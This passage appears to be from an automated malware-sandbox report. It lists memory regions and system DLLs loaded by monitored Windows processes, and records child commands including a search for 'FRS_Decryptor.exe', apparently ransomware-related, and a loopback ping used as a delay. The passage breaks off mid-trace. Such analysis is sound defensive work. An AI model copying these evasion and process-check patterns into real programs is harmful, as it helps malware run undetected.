"private_0x00000000008b0000" filename = "" Region: id = 5567 start_va = 0x9b0000 end_va = 0xa2dfff entry_point = 0x9b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5568 start_va = 0xb40000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 5569 start_va = 0xb50000 end_va = 0xcd7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 5570 start_va = 0xce0000 end_va = 0xe60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 5571 start_va = 0xe70000 end_va = 0x226ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 5572 start_va = 0x2270000 end_va = 0x23b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 5573 start_va = 0x23c0000 end_va = 0x2694fff entry_point = 0x23c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5574 start_va = 0x26a0000 end_va = 0x2a9bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026a0000" filename = "" Region: id = 5575 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5576 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5577 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 5578 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5579 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5580 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5581 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 5582 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5583 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5584 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 5585 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5586 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5587 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5588 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5589 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5590 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5591 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5592 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5593 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5594 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5595 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5596 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5597 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5598 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5599 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5600 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5601 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5602 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5603 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5604 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5605 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5606 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5607 start_va = 0x7ecd0000 end_va = 0x7edcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ecd0000" filename = "" Region: id = 5608 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5609 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 5610 start_va = 0xa70000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 5611 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 5612 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 5613 start_va = 0x2aa0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 5614 start_va = 0x2ae0000 end_va = 0x2b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 5615 start_va = 0x73420000 end_va = 0x7342ffff entry_point = 0x73420000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5616 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5617 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5618 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5619 start_va = 0x7ecca000 end_va = 0x7ecccfff entry_point = 0x0 region_type = private name = "private_0x000000007ecca000" filename = "" Region: id = 5620 start_va = 0x7eccd000 end_va = 0x7eccffff entry_point = 0x0 region_type = private name = "private_0x000000007eccd000" filename = "" Region: id = 5621 start_va = 0x7edfa000 end_va = 0x7edfcfff entry_point = 0x0 region_type = private name = "private_0x000000007edfa000" filename = "" Region: id = 5622 start_va = 0x73370000 end_va = 0x7341afff entry_point = 0x73370000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5623 start_va = 0x73350000 end_va = 0x7336afff entry_point = 0x73350000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Thread: id = 299 os_tid = 0x32c Thread: id = 301 os_tid = 0x434 Thread: id = 302 os_tid = 0x4ec Thread: id = 303 os_tid = 0x8c4 Process: id = "108" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x6a267000" os_pid = "0x4e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "106" os_parent_pid = "0x404" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5531 start_va = 0x9c0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 5532 start_va = 0x9e0000 end_va = 0x9e1fff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 5533 start_va = 0x9f0000 end_va = 0x9fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 5534 start_va = 0xa00000 end_va = 0xa3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 5535 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 5536 start_va = 0xa80000 end_va = 0xa83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 5537 start_va = 0xa90000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 5538 start_va = 0xaa0000 end_va = 0xaa1fff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 5539 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 5540 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5541 start_va = 0x7f0e0000 end_va = 0x7f102fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0e0000" filename = "" Region: id = 5542 start_va = 0x7f105000 end_va = 0x7f105fff entry_point = 0x0 region_type = private name = "private_0x000000007f105000" filename = "" Region: id = 5543 start_va = 0x7f10c000 end_va = 0x7f10efff entry_point = 0x0 region_type = private name = "private_0x000000007f10c000" filename = "" Region: id = 5544 start_va = 0x7f10f000 end_va = 0x7f10ffff entry_point = 0x0 region_type = private name = "private_0x000000007f10f000" filename = "" Region: id = 5545 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5546 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5547 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5548 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5553 start_va = 0xb30000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 5554 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5555 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5556 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5624 start_va = 0x9c0000 end_va = 0x9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 5625 start_va = 0x9d0000 end_va = 0x9d3fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 5626 start_va = 0x9e0000 end_va = 0x9e3fff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 5627 start_va = 0xab0000 end_va = 0xb2dfff entry_point = 0xab0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5628 start_va = 0xc00000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 5629 start_va = 0xc40000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 5630 start_va = 0x73340000 end_va = 0x7334efff entry_point = 0x73340000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 5631 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 5632 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5633 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5634 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5635 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Thread: id = 300 os_tid = 0x4e4 Process: id = "109" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0xb1d8000" os_pid = "0x4e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5636 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 5637 start_va = 0xd10000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 5638 start_va = 0xd30000 end_va = 0xd31fff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 5639 start_va = 0xd40000 end_va = 0xd4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 5640 start_va = 0xd50000 end_va = 0xd8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 5641 start_va = 0xd90000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 5642 start_va = 0xdd0000 end_va = 0xdd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 5643 start_va = 0xde0000 end_va = 0xde0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 5644 start_va = 0xdf0000 end_va = 0xdf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 5645 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5646 start_va = 0x7ede0000 end_va = 0x7ee02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ede0000" filename = "" Region: id = 5647 start_va = 0x7ee0b000 end_va = 0x7ee0dfff entry_point = 0x0 region_type = private name = "private_0x000000007ee0b000" filename = "" Region: id = 5648 start_va = 0x7ee0e000 end_va = 0x7ee0efff entry_point = 0x0 region_type = private name = "private_0x000000007ee0e000" filename = "" Region: id = 5649 start_va = 0x7ee0f000 end_va = 0x7ee0ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee0f000" filename = "" Region: id = 5650 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5651 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5652 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5653 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5654 start_va = 0xf90000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 5655 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5656 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5657 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5658 start_va = 0xd10000 end_va = 0xd1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 5659 start_va = 0xd20000 end_va = 0xd23fff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 5660 start_va = 0xe00000 end_va = 0xe7dfff entry_point = 0xe00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5661 start_va = 0xed0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 5662 start_va = 0x10b0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 5663 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5664 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5665 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5666 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5667 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5668 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5669 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5670 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5671 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5672 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5673 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5674 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5675 start_va = 0x7ece0000 end_va = 0x7eddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ece0000" filename = "" Region: id = 5676 start_va = 0xe80000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 5677 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 5678 start_va = 0x7ee08000 end_va = 0x7ee0afff entry_point = 0x0 region_type = private name = "private_0x000000007ee08000" filename = "" Region: id = 5679 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 5680 start_va = 0xd30000 end_va = 0xd32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 5681 start_va = 0xec0000 end_va = 0xec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 5682 start_va = 0xf20000 end_va = 0xf22fff entry_point = 0xf20000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 5683 start_va = 0xf30000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 5684 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 5685 start_va = 0x7ee05000 end_va = 0x7ee07fff entry_point = 0x0 region_type = private name = "private_0x000000007ee05000" filename = "" Thread: id = 304 os_tid = 0x5a0 [0109.789] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0109.789] __set_app_type (_Type=0x1) [0109.789] __p__fmode () returned 0x76ea1768 [0109.789] __p__commode () returned 